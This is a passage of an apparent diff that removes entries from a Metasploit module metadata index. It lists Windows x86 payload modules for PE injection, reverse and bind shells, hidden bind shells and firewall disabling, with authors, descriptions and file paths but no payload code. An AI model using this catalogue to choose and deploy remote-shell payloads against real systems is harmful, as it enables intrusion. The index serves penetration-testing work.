"URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", - "is_install_path": true, - "ref_name": "windows/peinject/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_windows/peinject/reverse_tcp_rc4": { - "name": "Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/peinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/peinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_windows/peinject/reverse_tcp_rc4_dns": { - "name": "Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/windows/peinject/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", - "is_install_path": true, - "ref_name": "windows/peinject/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_windows/peinject/reverse_tcp_uuid": { - "name": "Windows Inject PE Files, Reverse TCP Stager with UUID Support", - "fullname": "payload/windows/peinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "OJ Reeves" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker with UUID Support", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/peinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_windows/pingback_bind_tcp": { - "name": "Windows x86 Pingback, Bind TCP Inline", - "fullname": "payload/windows/pingback_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7" - ], - "description": "Open a socket and report UUID when a connection is received (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/pingback_bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/pingback_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/pingback_reverse_tcp": { - "name": "Windows x86 Pingback, Reverse TCP Inline", - "fullname": "payload/windows/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7" - ], - "description": "Connect back to attacker and report UUID (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/pingback_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/powershell_bind_tcp": { - "name": "Windows Interactive Powershell Session, Bind TCP", - "fullname": "payload/windows/powershell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ben Turner", - "Dave Hardy", - "vlad902 ", - "sf " - ], - "description": "Listen for a connection and spawn an interactive powershell session", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/powershell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/powershell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/powershell_reverse_tcp": { - "name": "Windows Interactive Powershell Session, Reverse TCP", - "fullname": "payload/windows/powershell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ben Turner", - "Dave Hardy", - "vlad902 ", - "sf " - ], - "description": "Listen for a connection and spawn an interactive powershell session", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/payloads/singles/windows/powershell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/powershell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/powershell_reverse_tcp_ssl": { - "name": "Windows Interactive Powershell Session, Reverse TCP SSL", - "fullname": "payload/windows/powershell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ben Turner", - "Dave Hardy", - "vlad902 ", - "sf " - ], - "description": "Listen for a connection and spawn an interactive powershell session over SSL", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/payloads/singles/windows/powershell_reverse_tcp_ssl.rb", - "is_install_path": true, - "ref_name": "windows/powershell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/shell/bind_hidden_ipknock_tcp": { - "name": "Windows Command Shell, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/windows/shell/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Spawn a piped command shell (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_windows/shell/bind_hidden_tcp": { - "name": "Windows Command Shell, Hidden Bind TCP Stager", - "fullname": "payload/windows/shell/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Spawn a piped command shell (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_windows/shell/bind_ipv6_tcp": { - "name": "Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/windows/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape " - ], - "description": "Spawn a piped command shell (staged).\n\nListen for an IPv6 connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_windows/shell/bind_ipv6_tcp_uuid": { - "name": "Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape ", - "OJ Reeves" - ], - "description": "Spawn a piped command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/shell/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_windows/shell/bind_named_pipe": { - "name": "Windows Command Shell, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/windows/shell/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "UserExistsError" - ], - "description": "Spawn a piped command shell (staged).\n\nListen for a pipe connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/shell/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_windows/shell/bind_nonx_tcp": { - "name": "Windows Command Shell, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/windows/shell/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "vlad902 " - ], - "description": "Spawn a piped command shell (staged).\n\nListen for a connection (No NX)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_windows/shell/bind_tcp": { - "name": "Windows Command Shell, Bind TCP Stager (Windows x86)", - "fullname": "payload/windows/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape " - ], - "description": "Spawn a piped command shell (staged).\n\nListen for a connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_tcp" - }, - "payload_windows/shell/bind_tcp_rc4": { - "name": "Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/shell/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Spawn a piped command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/shell/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_windows/shell/bind_tcp_uuid": { - "name": "Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Spawn a piped command shell (staged).\n\nListen for a connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_windows/shell/find_tag": { - "name": "Windows Command Shell, Find Tag Ordinal Stager", - "fullname": "payload/windows/shell/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "skape " - ], - "description": "Spawn a piped command shell (staged).\n\nUse an established connection", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/findtag_ord.rb", - "is_install_path": true, - "ref_name": "windows/shell/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/findtag_ord" - }, - "payload_windows/shell/reverse_ipv6_tcp": { - "name": "Windows Command Shell, Reverse TCP Stager (IPv6)", - "fullname": "payload/windows/shell/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape " - ], - "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker over IPv6", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_windows/shell/reverse_nonx_tcp": { - "name": "Windows Command Shell, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/windows/shell/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "vlad902 " - ], - "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker (No NX)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_windows/shell/reverse_ord_tcp": { - "name": "Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/windows/shell/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf " - ], - "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_windows/shell/reverse_tcp": { - "name": "Windows Command Shell, Reverse TCP Stager", - "fullname": "payload/windows/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape " - ], - "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp" - }, - "payload_windows/shell/reverse_tcp_allports": { - "name": "Windows Command Shell, Reverse All-Port TCP Stager", - "fullname": "payload/windows/shell/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape " - ], - "description": "Spawn a piped command shell (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", - "is_install_path": true, - "ref_name": "windows/shell/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_windows/shell/reverse_tcp_dns": { - "name": "Windows Command Shell, Reverse TCP Stager (DNS)", - "fullname": "payload/windows/shell/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape ", - "RageLtMan" - ], - "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", - "is_install_path": true, - "ref_name": "windows/shell/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_windows/shell/reverse_tcp_rc4": { - "name": "Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/shell/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/shell/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_windows/shell/reverse_tcp_rc4_dns": { - "name": "Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/windows/shell/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", - "is_install_path": true, - "ref_name": "windows/shell/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_windows/shell/reverse_tcp_uuid": { - "name": "Windows Command Shell, Reverse TCP Stager with UUID Support", - "fullname": "payload/windows/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_windows/shell/reverse_udp": { - "name": "Windows Command Shell, Reverse UDP Stager with UUID Support", - "fullname": "payload/windows/shell/reverse_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "RageLtMan " - ], - "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_udp.rb", - "is_install_path": true, - "ref_name": "windows/shell/reverse_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_udp" - }, - "payload_windows/shell_bind_tcp": { - "name": "Windows Command Shell, Bind TCP Inline", - "fullname": "payload/windows/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/shell_bind_tcp_xpfw": { - "name": "Windows Disable Windows ICF, Command Shell, Bind TCP Inline", - "fullname": "payload/windows/shell_bind_tcp_xpfw", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Lin0xx " - ], - "description": "Disable the Windows ICF, then listen for a connection and spawn a command shell", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb", - "is_install_path": true, - "ref_name": "windows/shell_bind_tcp_xpfw", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/shell_hidden_bind_tcp": { - "name": "Windows Command Shell, Hidden Bind TCP Inline", - "fullname": "payload/windows/shell_hidden_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sd", - "Borja Merino " - ], - "description": "Listen for a connection from certain IP and spawn a command shell.\n The shellcode will reply with a RST packet if the connections is not\n coming from the IP defined in AHOST. This way the port will appear\n as \"closed\" helping us to hide the shellcode.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb", - "is_install_path": true, - "ref_name": 